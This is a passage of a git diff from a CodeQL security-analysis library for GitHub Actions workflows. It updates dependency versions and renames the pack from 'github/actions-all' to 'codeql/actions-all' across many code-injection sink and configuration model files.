...sives_github-pages-deploy-action.model.yml | 2 +- .../jitterbit_get-changed-files.model.yml | 2 +- .../johnnymorganz_stylua-action.model.yml | 2 +- .../manual/jsdaniell_create-json.model.yml | 2 +- .../jsmith_changes-since-last-tag.model.yml | 2 +- .../jurplel_install-qt-action.model.yml | 2 +- .../ext/manual/jwalton_gh-ecr-push.model.yml | 4 ++-- .../kaisugi_action-regex-match.model.yml | 2 +- ...rpikpl_list-changed-files-action.model.yml | 2 +- ...han_pull-request-comment-trigger.model.yml | 2 +- ql/lib/ext/manual/knu_changed-files.model.yml | 2 +- ...leci-artifacts-redirector-action.model.yml | 2 +- .../ext/manual/leafo_gh-actions-lua.model.yml | 2 +- .../leafo_gh-actions-luarocks.model.yml | 2 +- ...logs_gh-action-get-changed-files.model.yml | 2 +- .../lucasbento_auto-close-issues.model.yml | 2 +- ...felipelaviola_parse-plain-dotenv.model.yml | 2 +- ..._actions-find-and-replace-string.model.yml | 2 +- .../ext/manual/magefile_mage-action.model.yml | 2 +- .../manual/maierj_fastlane-action.model.yml | 2 +- .../manusa_actions-setup-minikube.model.yml | 2 +- .../manual/marocchino_on_artifact.model.yml | 2 +- .../martinhaintz_ga-file-list.model.yml | 2 +- .../manual/mattdavis0351_actions.model.yml | 4 ++-- .../meteorengineer_setup-meteor.model.yml | 2 +- ...tro-digital_setup-tools-for-waas.model.yml | 2 +- .../manual/microsoft_setup-msbuild.model.yml | 2 +- ql/lib/ext/manual/mikefarah_yq.model.yml | 2 +- ...mishakav_pytest-coverage-comment.model.yml | 2 +- ...hers-excellent_docker-build-push.model.yml | 2 +- ql/lib/ext/manual/msys2_setup-msys2.model.yml | 2 +- .../manual/mxschmitt_action-tmate.model.yml | 2 +- .../manual/mymindstorm_setup-emsdk.model.yml | 4 ++-- .../nanasess_setup-chromedriver.model.yml | 2 +- .../ext/manual/nanasess_setup-php.model.yml | 2 +- ql/lib/ext/manual/nick-fields_retry.model.yml | 2 +- .../manual/octokit_graphql-action.model.yml | 2 +- .../manual/octokit_request-action.model.yml | 2 +- .../ext/manual/olafurpg_setup-scala.model.yml | 2 +- .../paambaati_codeclimate-action.model.yml | 2 +- ...ulschuberth_regex-extract-action.model.yml | 2 +- .../peter-evans_create-pull-request.model.yml | 2 +- ...-murray_issue-body-parser-action.model.yml | 2 +- ...r-murray_issue-forms-body-parser.model.yml | 2 +- .../plasmicapp_plasmic-action.model.yml | 2 +- .../potiuk_get-workflow-origin.model.yml | 2 +- .../preactjs_compressed-size-action.model.yml | 2 +- ql/lib/ext/manual/py-actions_flake8.model.yml | 2 +- ...py-actions_py-dependency-install.model.yml | 2 +- .../ext/manual/pyo3_maturin-action.model.yml | 2 +- ...vecircus_android-emulator-runner.model.yml | 2 +- ql/lib/ext/manual/read-file-actions.model.yml | 2 +- ...bers-in-action_download-artifact.model.yml | 2 +- .../ext/manual/reggionick_s3-deploy.model.yml | 2 +- ql/lib/ext/manual/release-kit_regex.model.yml | 2 +- .../renovatebot_github-action.model.yml | 2 +- .../rishabh510_path-lister-action.model.yml | 2 +- .../roots_issue-closer-action.model.yml | 2 +- .../manual/ros-tooling_setup-ros.model.yml | 2 +- ql/lib/ext/manual/ruby_setup-ruby.model.yml | 4 ++-- ...ction-detect-and-tag-new-version.model.yml | 4 ++-- .../ext/manual/sergeysova_jq-action.model.yml | 2 +- ...shallwefootball_upload-s3-action.model.yml | 2 +- .../shogo82148_actions-setup-perl.model.yml | 2 +- ...skitionek_notify-microsoft-teams.model.yml | 2 +- .../ext/manual/snow-actions_eclint.model.yml | 2 +- .../stackhawk_hawkscan-action.model.yml | 2 +- .../step-security_harden-runner.model.yml | 2 +- .../suisei-cn_actions-download-file.model.yml | 2 +- .../the-coding-turtle_ga-file-list.model.yml | 2 +- ql/lib/ext/manual/tibdex_backport.model.yml | 2 +- .../tim-actions_get-pr-commits.model.yml | 2 +- .../manual/timheuer_base64-to-file.model.yml | 2 +- .../manual/tj-actions_branch-names.model.yml | 2 +- ...tmelliottjr_extract-regex-action.model.yml | 2 +- .../trilom_file-changes-action.model.yml | 2 +- ...ss_conventional-changelog-action.model.yml | 2 +- .../tryghost_action-deploy-theme.model.yml | 2 +- .../manual/tzkhan_pr-update-action.model.yml | 2 +- .../manual/veracode_veracode-sca.model.yml | 2 +- .../w3f_action-find-old-files.model.yml | 2 +- .../wearerequired_lint-action.model.yml | 2 +- .../ext/manual/webfactory_ssh-agent.model.yml | 2 +- ql/lib/ext/manual/xom9ikk_dotenv.model.yml | 2 +- ...rted_pull-request-comment-branch.model.yml | 2 +- .../manual/yumemi-inc_changed-files.model.yml | 2 +- .../manual/zaproxy_action-baseline.model.yml | 2 +- .../manual/zaproxy_action-full-scan.model.yml | 2 +- ...zentered_issue-forms-body-parser.model.yml | 2 +- 792 files changed, 833 insertions(+), 823 deletions(-) diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 21e0b8bb0e91..c4ef87bc2512 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,25 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 1.0.1 + version: 1.0.10 codeql/dataflow: - version: 1.0.1 + version: 1.1.4 + codeql/javascript-all: + version: 2.0.2 + codeql/mad: + version: 1.0.10 + codeql/regex: + version: 1.0.10 codeql/ssa: - version: 1.0.1 + version: 1.0.10 + codeql/tutorial: + version: 1.0.10 codeql/typetracking: - version: 1.0.1 + version: 1.0.10 codeql/util: - version: 1.0.1 + version: 1.0.10 + codeql/xml: + version: 1.0.10 codeql/yaml: - version: 1.0.1 + version: 1.0.10 compiled: false diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml index 56fced44da8b..3214ce522876 100644 --- a/ql/lib/ext/config/argument_injection_sinks.yml +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: argumentInjectionSinksDataModel # https://gtfobins.github.io/ # https://0xn3va.gitbook.io/cheat-sheets/web-application/command-injection/argument-injection diff --git a/ql/lib/ext/config/context_event_map.yml b/ql/lib/ext/config/context_event_map.yml index 4d28fa778e0f..930a4344e12e 100644 --- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: contextTriggerDataModel data: - ["commit_comment", "github.event.comment"] diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml index 7d40620e9139..e1bfca52ea79 100644 --- a/ql/lib/ext/config/externally_triggereable_events.yml +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: externallyTriggerableEventsDataModel data: - ["discussion"] diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 2f03b94b4027..bca33af8dc5a 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: poisonableActionsDataModel # source: https://boostsecurityio.github.io/lotp/ data: @@ -13,7 +13,7 @@ extensions: - ["qcastel/github-actions-maven/actions/maven"] - ["sonarsource/sonarcloud-github-action"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: poisonableCommandsDataModel # source: https://boostsecurityio.github.io/lotp/ data: @@ -61,7 +61,7 @@ extensions: - ["yarn"] - ["webpack"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` diff --git a/ql/lib/ext/config/untrusted_event_properties.yml b/ql/lib/ext/config/untrusted_event_properties.yml index 1e54fa6eca3f..cf3d6df80949 100644 --- a/ql/lib/ext/config/untrusted_event_properties.yml +++ b/ql/lib/ext/config/untrusted_event_properties.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: untrustedEventPropertiesDataModel data: # TITLE diff --git a/ql/lib/ext/config/untrusted_gh_command.yml b/ql/lib/ext/config/untrusted_gh_command.yml index 653f9e31c983..c81c048e45eb 100644 --- a/ql/lib/ext/config/untrusted_gh_command.yml +++ b/ql/lib/ext/config/untrusted_gh_command.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: untrustedGhCommandDataModel data: # diff --git a/ql/lib/ext/config/untrusted_git_command.yml b/ql/lib/ext/config/untrusted_git_command.yml index e862267027a9..05fda3e1cd9f 100644 --- a/ql/lib/ext/config/untrusted_git_command.yml +++ b/ql/lib/ext/config/untrusted_git_command.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: untrustedGitCommandDataModel data: # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r) diff --git a/ql/lib/ext/config/vulnerable_actions.yml b/ql/lib/ext/config/vulnerable_actions.yml index eb452983bfc5..1fe00ad733bb 100644 --- a/ql/lib/ext/config/vulnerable_actions.yml +++ b/ql/lib/ext/config/vulnerable_actions.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: vulnerableActionsDataModel data: diff --git a/ql/lib/ext/config/workflow_runtime_data.yml b/ql/lib/ext/config/workflow_runtime_data.yml index 88e266d8142a..f02a6bc20aa2 100644 --- a/ql/lib/ext/config/workflow_runtime_data.yml +++ b/ql/lib/ext/config/workflow_runtime_data.yml @@ -1,9 +1,9 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: repositoryDataModel data: [] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: workflowDataModel data: [] diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index a098666dba01..ba6dbbe91e62 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index 476c522f5ea0..b3430655e014 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index ad369575c423..3c6e8718fb42 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index e68306a454c8..fee02f3d3bde 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index 923d267ac662..c102a42d3ea8 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index 9557cbbee80d..77744b4ab474 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index eea604dc8ddc..e9e6941e6343 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 5ee8503193bc..e0240360052b 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index 44795adc64a0..cae561f77754 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index a1a7e28f5722..18d893d4c53d 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index 792a00ea3874..b40d68cc560b 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index 5ee9c5aefbed..9282d312fb8f 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index 8b438734d5d6..f0636131cdb0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index a62226055750..4bac281500b9 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index 07c4cc427c10..3ee27175205f 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 77adcd6151d0..37c2873b508b 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index fe453b3086d2..231df2a7f879 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index 6d5296ba6d1f..94ba6559838a 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index 14600fdc23ef..ab91a71fc0e1 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index a67988b08aa8..b704cc54b822 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index 663702e64180..b438360b5a6a 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index de7a728d096c..05b822ebc4d0 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index 360eb948595e..de7c35fa1113 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index 290712830e2c..4ef3ce32bfed 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index d58063c2452f..0efe533073ba 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index 784627c32abf..a472b1be979e 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index b4f5866b86d4..409c39077866 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 77a7407adfbf..29a0e582ec7e 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["archivesspace/archivesspace", "*", "input.mysql-connector-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml index a97bce1de7a0..5d88aaf00174 100644 --- a/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml +++ b/ql/lib/ext/generated/composite-actions/armadaproject_armada.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["armadaproject/armada", "*", "input.tox-env", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml index 5bf814bcc693..fe2fb29bfa8c 100644 --- a/ql/lib/ext/generated/composite-actions/armbian_build.model.yml +++ b/ql/lib/ext/generated/composite-actions/armbian_build.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["armbian/build", "*", "input.armbian_pgp_password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml index 6a141053bbeb..7107b1dd55d9 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["auth0/auth0-java", "*", "input.signing-password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml index 4fec81ed1780..7ecc0cb0e614 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["auth0/auth0.net", "*", "input.nuget-token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml index 1290646ef6dc..c75ff3a69140 100644 --- a/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml +++ b/ql/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["auth0/auth0.swift", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml index 60a023c97301..ed5dae960604 100644 --- a/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml +++ b/ql/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["autogluon/autogluon", "*", "input.submodule-to-test", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml index 1a99c3773de0..a638ceae55ca 100644 --- a/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml +++ b/ql/lib/ext/generated/composite-actions/avaiga_taipy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["avaiga/taipy", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml index e3cf5db0f15b..eb67c35e5f5a 100644 --- a/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-cli", "*", "input.cli-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml index 67866c4f904c..abfb5157d3bb 100644 --- a/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml +++ b/ql/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["aws-powertools/powertools-lambda-python", "*", "input.artifact_name_prefix", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml 